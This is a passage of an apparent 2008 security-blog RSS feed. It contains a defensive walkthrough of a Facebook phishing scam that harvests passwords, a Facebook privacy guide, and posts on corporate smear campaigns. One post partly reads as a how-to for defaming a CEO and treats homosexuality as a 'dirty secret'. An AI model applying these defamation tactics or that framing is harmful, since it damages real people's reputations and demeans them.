target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Analysis of a new Facebook phish</title>
         <link>http://blog.blogsecurify.com/2008/11/analysis-of-new-facebook-phish.html</link>
         <description>&lt;div style="text-align:justify;"&gt;I recently noticed an interesting trend with Facebook. There seems to be an increase in spam and in particular a new type of phishing attempt has emerged that I have been seeing signs of on many different profiles. While phishing via Facebook is &lt;a rel="nofollow" target="_blank" href="http://www.techcrunch.com/2008/01/02/phishing-for-facebook/"&gt;nothing&lt;/a&gt; &lt;a rel="nofollow" target="_blank" href="http://informednetworker.com/blog/2008/08/09/danger-facebook-phish/"&gt;new&lt;/a&gt;, this one is a bit different as the victim is not taken to a website that "looks" like a Facebook login page. This phish uses painfully annoying questions and pop-up's to get you to divulge your account information.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;D&lt;/span&gt;&lt;span class="Apple-style-span" style="font-weight:bold;"&gt;o&lt;/span&gt;&lt;span class="Apple-style-span" style="font-weight:bold;"&gt; not go to any of the URL's mentioned in this article! You have been warned!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="text-align:justify;"&gt;&lt;span style="font-weight:bold;"&gt;How does the phish work?&lt;/span&gt;&lt;br /&gt;You will get an email or notice a wall post from one of your friends in Facebook. Note that your friend that has posted to your wall has had their account compromised or they have really fallen for the scam and have sent links out manually...more on that in a minute. &lt;span style="font-weight:bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-weight:bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSOFtjX82kI/AAAAAAAAACg/0jNffFeQeyw/s1600-h/fb_phish_email.jpg"&gt;&lt;img style="cursor:pointer;width:400px;height:172px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSOFtjX82kI/AAAAAAAAACg/0jNffFeQeyw/s400/fb_phish_email.jpg" alt="" id="BLOGGER_PHOTO_ID_5270203006589917762" border="0"/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Initial contact via email notification or wall post (below).&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;img id="BLOGGER_PHOTO_ID_5269829233655820722" style="width:320px;height:59px;" alt="" src="http://3.bp.blogspot.com/_TkVLLciT0WE/SSIxxGsGMbI/AAAAAAAAAA4/tC49tKOSs6M/s320/fb_malware_wallpost.jpg" border="0"/&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Notice the really bad wording of the following:&lt;/div&gt;&lt;div style="font-weight:bold;"&gt;&lt;blockquote&gt;"hey has anyone messaged you to let you know your face book pictre is all over ****.com?"&lt;/blockquote&gt;&lt;/div&gt;&lt;div style="text-align:justify;"&gt;&lt;div style="text-align:justify;"&gt;Notice the bad grammar and misspelling? This should be your first clue that this is a phish and you should not check out this domain no matter how curious you are! The bad news is most people will check it out....&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Next, a pop-up will appear showing a link to hxxp://rotating -destination.com.&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;img id="BLOGGER_PHOTO_ID_5269831435402907650" style="width:342px;height:133px;" alt="" src="http://2.bp.blogspot.com/_TkVLLciT0WE/SSIzxQ1gkAI/AAAAAAAAABI/Piv5tuzUQzw/s400/pop-up1.jpg" border="0"/&gt; &lt;div&gt; &lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;More "enticing" wording for you to click the OK button.&lt;/div&gt;&lt;br /&gt;&lt;div&gt; &lt;/div&gt; &lt;div&gt;Clicking on this pop-up asks you to enter in the name of your friend, your name and your email.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt; &lt;div&gt;&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_TkVLLciT0WE/SSI_-dDnpsI/AAAAAAAAABY/kG0IrxUxPOs/s1600-h/pop-up2.jpg"&gt;&lt;img style="cursor:pointer;width:342px;height:237px;" src="http://1.bp.blogspot.com/_TkVLLciT0WE/SSI_-dDnpsI/AAAAAAAAABY/kG0IrxUxPOs/s400/pop-up2.jpg" alt="" id="BLOGGER_PHOTO_ID_5269844856161150658" border="0"/&gt;&lt;/a&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;&lt;br /&gt;Next, it takes you to this pop-up asking for your password for "registration".&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_TkVLLciT0WE/SSJAwpY6Q1I/AAAAAAAAABg/zvCK8KuXwZ4/s1600-h/pop-up3.jpg"&gt;&lt;img style="cursor:pointer;width:308px;height:248px;" src="http://1.bp.blogspot.com/_TkVLLciT0WE/SSJAwpY6Q1I/AAAAAAAAABg/zvCK8KuXwZ4/s400/pop-up3.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845718465135442" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After entering in your password it asks you how you found the site.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAwxj7N6I/AAAAAAAAABo/o6K4mQB5SzU/s1600-h/pop-up4.jpg"&gt;&lt;img style="cursor:pointer;width:400px;height:162px;" src="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAwxj7N6I/AAAAAAAAABo/o6K4mQB5SzU/s400/pop-up4.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845720658818978" border="0"/&gt;&lt;/a&gt;&lt;div&gt;&lt;br /&gt;Interestingly, if you click on MySpace or Facebook it says it cannot retrieve your image.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAw2iMy1I/AAAAAAAAABw/F8yp1zg-Kzc/s1600-h/pop-up5.jpg"&gt;&lt;img style="cursor:pointer;width:329px;height:213px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAw2iMy1I/AAAAAAAAABw/F8yp1zg-Kzc/s400/pop-up5.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845721993759570" border="0"/&gt;&lt;/a&gt;&lt;/div&gt; &lt;/div&gt;&lt;br /&gt;After clicking on a link (they all seem lead to the same place) you will get to a page that tells you that they can't serve content to Facebook/MySpace.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAxEM3ApI/AAAAAAAAAB4/-X6iR5F4a-w/s1600-h/pop-up6.jpg"&gt;&lt;img style="cursor:pointer;width:349px;height:128px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSJAxEM3ApI/AAAAAAAAAB4/-X6iR5F4a-w/s400/pop-up6.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845725662347922" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align:justify;"&gt;Clicking the back button you will get another pop-up and after that you have to participate in an online "quiz". It's in a frame and really looks more like the ads you see online (click on the monkey, etc). This is the part that will generate ad revenue for phisher.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAxA52DFI/AAAAAAAAACA/GAGodbBiUD0/s1600-h/pop-up7.jpg"&gt;&lt;img style="cursor:pointer;width:351px;height:198px;" src="http://3.bp.blogspot.com/_TkVLLciT0WE/SSJAxA52DFI/AAAAAAAAACA/GAGodbBiUD0/s400/pop-up7.jpg" alt="" id="BLOGGER_PHOTO_ID_5269845724777286738" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After the quiz you get to a screen which says that you have an image waiting for you and gives you a link to click.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSNzy8ULd9I/AAAAAAAAACI/LccIsyYcNlo/s1600-h/pop-up8.jpg"&gt;&lt;img style="cursor:pointer;width:400px;height:75px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSNzy8ULd9I/AAAAAAAAACI/LccIsyYcNlo/s400/pop-up8.jpg" alt="" id="BLOGGER_PHOTO_ID_5270183307975030738" border="0"/&gt;&lt;/a&gt;&lt;div&gt;&lt;br /&gt;Clicking on the link takes you to a site with a picture of a monkey and plays the sound of someone laughing...nice.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://4.bp.blogspot.com/_TkVLLciT0WE/SSN7dKn6EoI/AAAAAAAAACQ/PNp-DQ1_m74/s1600-h/pop-up9.jpg"&gt;&lt;img style="cursor:pointer;width:300px;height:214px;" src="http://4.bp.blogspot.com/_TkVLLciT0WE/SSN7dKn6EoI/AAAAAAAAACQ/PNp-DQ1_m74/s400/pop-up9.jpg" alt="" id="BLOGGER_PHOTO_ID_5270191729951773314" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Finally, there is a link to a page of the bottom of this picture that takes you to a page telling you how to send this "harmless prank" to your friends....&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_TkVLLciT0WE/SSN9DXS-4tI/AAAAAAAAACY/UKtZuP6SRyQ/s1600-h/pop-up10.jpg"&gt;&lt;img style="cursor:pointer;width:384px;height:400px;" src="http://1.bp.blogspot.com/_TkVLLciT0WE/SSN9DXS-4tI/AAAAAAAAACY/UKtZuP6SRyQ/s400/pop-up10.jpg" alt="" id="BLOGGER_PHOTO_ID_5270193485700326098" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align:justify;"&gt;Not sure if I have seen a phisher actually ask you for help! Makes things even easier for the phish creator. They even tell you to use "regular" email as you don't want Facebook to block you for being a "spammer"...&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align:justify;"&gt;&lt;span style="font-weight:bold;"&gt;What's the end result?&lt;/span&gt;&lt;br /&gt;The victim who goes to this website and enters in all the information requested will get their Facebook and/or MySpace profile hijacked (probably with an automated login script) and most likely their email compromised as well. Unfortunately, most people use the same password for both social media sites and email so this is a rather serious problem. If you or anyone you know fell victim to this phish, I advise changing your social media and email passwords immediately.&lt;br /&gt;&lt;br /&gt;Special thanks to &lt;a rel="nofollow" target="_blank" href="http://securityblahblah.blogspot.com/"&gt;Greg&lt;/a&gt; and &lt;a rel="nofollow" target="_blank" href="http://secshoggoth.blogspot.com/"&gt;Tyler&lt;/a&gt; for helping out with the detailed analysis of this phish. Greg and Tyler do a ton of great malware analysis and they did some research to help determine if this phish was malware related. While there was no malicious downloads detected in this specific instance, Greg mentions the following additional information about this phish:&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align:justify;"&gt;&lt;ul&gt;&lt;li&gt;The IP of the first domain is associated with 16 malware domains have been related to malware in the past (some serving Zlob trojans and one related to bogus blogs) so don't be surprised if this scam gets more agressive in the future.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;The IP is hosted with Oversee.net which is associated with about 90 instances of malware and rouge software.&lt;/li&gt;&lt;li&gt;There is code in the HTML where a graphic would be served up with 1 pixel x 1 pixel (essentially hidden) but that code is commented out. So at some point that graphic might have had some exploit code or perhaps used to log your IP.&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;span style="font-weight:bold;"&gt;Some thoughts on how not to be a victim&lt;/span&gt;&lt;br /&gt;Here are a few things to remember so you don't become a victim of these and other types of scams:&lt;br /&gt;&lt;ul style="text-align:justify;"&gt;&lt;li&gt;Use a different, complex password for each of your accounts. That way if one password gets compromised all your other accounts don't get compromised as well.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Even if your friends want you to click on links, be cautious! You never know if their profiles or email accounts have been hacked!&lt;/li&gt;&lt;li&gt;Look for bad grammar and misspelled words as your first clue to a phish.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Check out the &lt;a rel="nofollow" target="_blank" href="http://spylogic.net/downloads/Facebook_Privacy_and_Security_Guide.pdf"&gt;Facebook Privacy &amp;amp; Security Guide&lt;/a&gt; which gives you some good tips to follow when using social media websites.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-5488672181582333575?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-5488672181582333575</guid>
         <pubDate>Mon, 17 Nov 2008 18:20:00 -0800</pubDate>
         <media:thumbnail width="72" url="http://4.bp.blogspot.com/_TkVLLciT0WE/SSOFtjX82kI/AAAAAAAAACg/0jNffFeQeyw/s72-c/fb_phish_email.jpg" height="72" />
      </item>
      <item>
         <title>Top Reputation Nightmares for CEOs</title>
         <link>http://www.spinhunters.org/blog/top-reputation-nightmares-for-ceos/</link>
         <description>Ask any reputation strategist and he will tell you that the most vulnerable asset of any corporation is its very own leader. Actually CEO&amp;#8217;s reputation represent around 49%-65% of overall corporate reputation and thus it is inevitable part of numerous Black PR scenarios. The reason for this is because it requires much less efforts and time to defame a person, than to concentrate on the disparagement of an entire organization. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=119</guid>
         <pubDate>Thu, 13 Nov 2008 09:07:26 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/sis/88844769/"><img class="initial-capital" src="http://farm1.static.flickr.com/22/88844769_b775acbabe_m.jpg?v=0" alt="Nobody Loves Me! The Valentine Nightmare."/></a><p>Ask any reputation strategist and he will tell you that the most vulnerable asset of any corporation is its very own leader. Actually CEO&#8217;s reputation represent around 49%-65% of overall corporate reputation and thus it is inevitable part of numerous Black PR scenarios. The reason for this is because it requires much less efforts and time to defame a person, than to concentrate on the disparagement of an entire organization.</p> <p>The objectives of the smear campaigns, on the other hand, could also be different. Usually there are two simple goals behind every reputation attack. The first one is directed at the personal qualities of the target and it aims his official resignation. Most of the time these types of attacks come from inside the company and are used when the leader is no longer suitable for the general corporate performance. It is also very convenient when he/she cannot be dismissed directly or is a great obstacle for someone&#8217;s interest. The second reason for CEO defamation is when the black- hats are trying to distract the attention of the industry&#8217;s stakeholders or are aiming to cause extra troubles for the organization. It is not a surprise that this is a very common situation during important events like new product launching or some forthcoming acquisitions.</p> <p>Due to the high volume of recent reputation attacks, I tried to summarize the most common malicious scenarios that CEO&#8217;s could be involved in. Of course, there are a lot more scenarios than those that I have listed. Keep in mind that everything depends on the creativity of the attacker. The golden rule here is that the more uncommon the plan is, the more effective the results would be.</p> <ol>
<li><strong>Sexual Harassment</strong> &#8211; This is the most popular type of attack that a leader could face. It is quite easy to be proved and works almost every time. All you need to do is to find a suitable victim, sufficient evidences and a tabloid editor, willing to pay enough for the story. Once the scandal is triggered, you can just sit down and relax.</li>
<li><strong>Hypocrisy</strong> &#8211; The point here is to reveal a discrepancy between leader&#8217;s official attitude and his actual deeds. The latest example is the Sara Palin fashion affair. The problem there was not that she likes to wear very expensive, designer clothes, but the fact she is not a regular American girl as she had been trying to portray herself.</li>
<li><strong>Membership of controversial groups</strong> &#8211; This is a really powerful approach. If you can prove that the CEO is a part of a mob gang, religious cult or secret society, than his media crucifixion will be certain. The corporate long term strategies will also be affected.</li>
<li><strong>Professional Incompetence</strong> &#8211; if the leader is incapable of making good decisions and taking responsibilities of his action , then the quality of the corporate services will be put under a serious suspicion. This is pretty scary for most of the B2B type of companies.</li>
<li><strong>Misuse of corporate resources (Embezzlement)</strong> &#8211; Financial wrongdoing and unethical behavior are probably the most significant threats to every corporate reputation.Such is the case with the Deyaar&#8217;s ex-CEO, Zack Shahin, who was suspected of embezzling over $33 millions into his personal accounts. The scandal broke earlier this year and let to his immediate discharge as the head of the biggest property developer in Dubai. According to the Gulf media sources, the company is still trying to recover its tarnished reputation and to regain the trust of its shareholders.</li>
<p><strong>I want to clarify that the person who was accused of embezzling Deyaar Development&#8217; resources is Zack Shahin , not Nasser Al-Shaikh as was stated earlier before. Mr. Al-Shekih is the current Chairman of the company and The General Director of Dubai Department of Finance. Spin Hunters apologies for any inconvenience we might caused with this post.
</strong></p>
<li><strong>Indictment</strong> &#8211; When it comes to CEO&#8217;s reputation, ethical conduct is always on the top. Bernard Ebbers, the former CEO of WorldCom, learned that the hard way when he was indicted on federal charges stemming from the multi-billion dollar accounting fraud at the telecommunications giant. He was also charged of conspiracy and false filing with the Securities Exchange Commission. Today he is serving his sentence at the FCI Oakdale.</li>
<li><strong>Personality and Lifestyle</strong> &#8211; The main goal of the attacker here is to reveal all the dirty secrets of the target that are not publicly known. If the leader is a drug addict, a racist or a homosexual and this type of an image is in total clash with the position he takes, then not only the reputation of the organization, he is associated with, will suffer but also the reputation of the entire industry itself.</li>
</ol> <p><strong>Bottom Line:</strong> <em>CEO&#8217;s reputation will always be a target of professional smear campaigns. The best thing CEOs can do is to be completely honest and sincere with his PR strategic team, as this is the only way to tackle all pending reputation risks.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Facebook Privacy &amp; Security Guide</title>
         <link>http://blog.blogsecurify.com/2008/11/facebook-privacy-security-guide.html</link>
         <description>&lt;div style="text-align:justify;"&gt;Did you know that the default privacy and security settings in most social network websites are designed to share your personal information with as many people as possible? Did you ever stop to think about how &lt;span style="font-style:italic;"&gt;valuable&lt;/span&gt; your information is to the company that runs your favorite social network website? The more information you share...the more valuable you are. Are you posting too much personal information and could this information be used for things you didn't approve of?&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;div style="text-align:justify;"&gt;&lt;a rel="nofollow" target="_blank" href="http://spylogic.net/downloads/Facebook_Privacy_and_Security_Guide.pdf"&gt;This guide&lt;/a&gt; gives you suggested "baseline" privacy and security settings that you can use when configuring your Facebook account. Obviously, you can adjust these settings based on the level of risk you are comfortable with. However, this guide should give you a good starting point. In addition, I have listed five key tips in the guide that you should keep in mind when using any social network.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Why put this guide together?&lt;/span&gt;&lt;br /&gt;I have been doing several months of research with my own Facebook account as well as gathering the input of other Facebook users to determine what the privacy and security settings should be without loosing the key features of using a social network...the networking! I found that most users of Facebook have no idea that these settings even exist! Privacy and security settings can be easily configured to help limit the amount of personal information able to be shared with just about anyone, even outside your friends list.&lt;br /&gt;&lt;br /&gt;Please feel free to distribute this document to friends and family or use it for any security awareness campaigns. I will hopefully be keeping up with any updates to the document when Facebook changes things. I might be putting together a similar document together for MySpace. However, MySpace has a long way to go compared with Facebook in regards to privacy and security settings.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://spylogic.net/downloads/Facebook_Privacy_and_Security_Guide.pdf"&gt;You can download the latest version of the guide from my blog here.&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-1849366409657454444?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1849366409657454444</guid>
         <pubDate>Wed, 05 Nov 2008 19:18:00 -0800</pubDate>
      </item>
      <item>
         <title>Negative Word-Of-Mouth made easy with Tell-a-Friend</title>
         <link>http://www.spinhunters.org/blog/negative-word-of-mouth-made-easy-with-tell-a-friend/</link>
         <description>There is a new widget that caught my eye the other day and I have been playing with it ever since. It&amp;#8217;s called Tell-a-Friend and its general purpose is to help users to share any type of information without leaving the website where it is installed. Nothing new, you may say, but the point I want to make is that this tool actually enables visitors to access their friends with much greater speed and scope. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=116</guid>
         <pubDate>Tue, 04 Nov 2008 07:51:11 -0800</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/nyki_m/3000410746/in/set-72157607040408281/"><img class="initial-capital" src="http://farm4.static.flickr.com/3236/3000410746_3974a1e3c3_m.jpg?v=0" alt="Mouth"/></a><p>There is a new widget that caught my eye the other day and I have been playing with it ever since. It&#8217;s called <a rel="nofollow" target="_blank" href="http://http://tellafriend.socialtwist.com/index.jsp">Tell-a-Friend</a> and its general purpose is to help users to share any type of information without leaving the website where it is installed. Nothing new, you may say, but the point I want to make is that this tool actually enables visitors to access their friends with much greater speed and scope. So, instead of remembering all the contact details of your LinkedIn network, you can now spread your messages with less efforts and boring authentication requests. Convenient for ones, quite scary for others! Tell-a-Friend is a two-edged sword that can successfully build and destroy your reputation in a matter of minutes. Everything depends on the professional skills of both the black-hats and the reputation management consultants.</p> <p>It is not a surprise that most of the serious PR agencies today design Word-of-Mouth (WOM) strategies as part of their promotion services. They are well aware of the power of peer-to-peer sharing and that most potential costumers heavily rely on the advice and the input of the people they trust. A professionally executed WOM campaign is hundreds of times more effective than any other advertising platform combined with the best communication tactics, especially when it can also help boosting the sales performance and corporate operational profit.</p> <p>One of the most specific features of WOM marketing is that it barely relies on any substantial facts, but personal opinions. So, even if you read something about yourself on the Web that it is not entirely true, the measures you can take are pretty limited. It is almost impossible to start legal actions against a whole community, especially when the initial source of the rumor is hard to be identified. It is also quite stupid for a company to blame someone because of his personal believes and thus all marketing books share the opinion that customer is always right.</p> <p> I will stop here. I think it is pointless to explain further the importance of Word-of-Mouth and its global impact on corporate reputations. However, I believe it is crucial to discuss its usage as rumor spreading accelerator and general defamation tool.</p> <h3>What makes Negative WOM so powerful?</h3> <p>It is proven that people trust negative information way more than any superlatives. If you hear something bad about someone, this is more likely to be remembered than the high volume of positive stories you can find about that very same person. The reason for this are the libel messages with their embellishing nature which causes the drama effect. This means that if you start a rumor about something,,at the end of the day it will sound totally different from its initial form. In fact, every time when somebody repeats the story, the impact will be much bigger and stronger over the target audience. None of the other communication tools enable you to do that.</p> <p>The other thing I would like to mention is the tempo, with which viral messages could be disseminated. This is extremely important for every defamation campaign , because it disables the target to react promptly on existing reputation attacks. If the target delays its official respond or fail to give a reasonable explanation of the buzz (with enough number of facts), then the allegations will be subconsciously confirmed by the audience. Moreover, this delay may actually help the rumors to spread even more and this is how the target&#8217;s reputation can be permanently damaged.</p> <p>In conclusion, I can only say that most of the big corporations tend to underestimate the power of negative communication. They are willing to spend enormous amount of money for creating a positive buzz, but not fighting the negative one. In short term perspective, this may look reasonable, but keep in mind that there will always be someone that doesn&#8217;t like your product and will try everything to take you down. As I always say, it is up to you to decide whether this is going to happen.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Wordpress Updates to 2.6.3</title>
         <link>http://blog.blogsecurify.com/2008/10/wordpress-updates-to-263.html</link>
         <description>First let me thank pdp for letting me blog here. I have been reading GNUCITIZEN for a while now and I very happy to help out. &lt;br /&gt;&lt;br /&gt;In the past week Wordpress has updated their latest version to 2.6.3. Noticing this I decided to have Blogsecuify scan out my blog again. After about 30sec Blogsecuify checked and found that I was not running the latest version of Wordpress. So far this has been a great utility. &lt;br /&gt;&lt;br /&gt;One thing I would like to see is an upgrade of the icons. So far I have only seen caution icons next to string of text, sometimes these strings of text end in Excellent. I think maybe a green, yellow and red icon patter might be a nice upgrade. &lt;br /&gt;&lt;br /&gt;Thanks for all the heard works.&lt;br /&gt;JimShoe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-7658822719477266314?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (JimShoe)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-7658822719477266314</guid>
         <pubDate>Tue, 28 Oct 2008 10:54:00 -0700</pubDate>
      </item>
      <item>
         <title>Smear of the Year</title>
         <link>http://www.spinhunters.org/blog/smear-of-the-year/</link>
         <description>The high volume of recent smear campaigns has led to the need of a special acknowledgment. Spin Hunters is eager to rate the most popular cases of reputation attacks in the last year. Whether this will be the hysterical speculations over the upcoming election or the intensive rumors about the crush of a big financial institution, it is up to you decide. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=105</guid>
         <pubDate>Mon, 27 Oct 2008 10:29:00 -0700</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/bettinatizzy/2086994424/in/photostream/"><img class="initial-capital" src="http://farm3.static.flickr.com/2250/2086994424_7601870aaa_m.jpg?v=0" alt="Twisty Smears by Juria Yoshikawa"/></a><p><em>The high volume of recent smear campaigns has led to the need of a special acknowledgment.</em></p> <p>Spin Hunters is eager to rate the most popular cases of reputation attacks in the last year. Whether this will be the hysterical speculations over the upcoming election or the intensive rumors about the crush of a big financial institution, it is up to you decide. Therefore if you suspect that some of the current affairs are part of a malicious Black PR plot or you know this for sure, please submit your nominations by <a rel="nofollow" target="_blank" href="http://www.spinhunters.org/contact">emailing us</a>. At the end of the year, we will honor the most over-hyped stories by giving them a special award and public rebuke.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Netsecurify Screenshots</title>
         <link>http://blog.netsecurify.com/2008/10/netsecurify-screenshots.html</link>
